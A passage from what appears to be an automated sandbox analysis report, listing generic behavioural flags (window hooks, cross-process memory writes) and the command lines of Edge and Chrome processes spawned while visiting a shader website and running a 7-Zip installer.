N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\7z2406-x64.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2388 wrote to memory of 2536 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 2536 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 5004 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3524 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3524 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2388 wrote to memory of 3228 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bettershaders.com

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffef94246f8,0x7ffef9424708,0x7ffef9424718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5496 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2240,4353931913188469721,10278285303654910269,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5664 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeea5eab58,0x7ffeea5eab68,0x7ffeea5eab78

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1720 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2192 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3580 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4432 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4420 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4712 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4864 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4872 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4540 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4616 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4844 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4656 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4472 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4860 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2920 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4640 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=2232 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=212 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4896 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=4388 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5568 --field-trial-handle=1904,i,14013491062887567247,49909253945351939,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

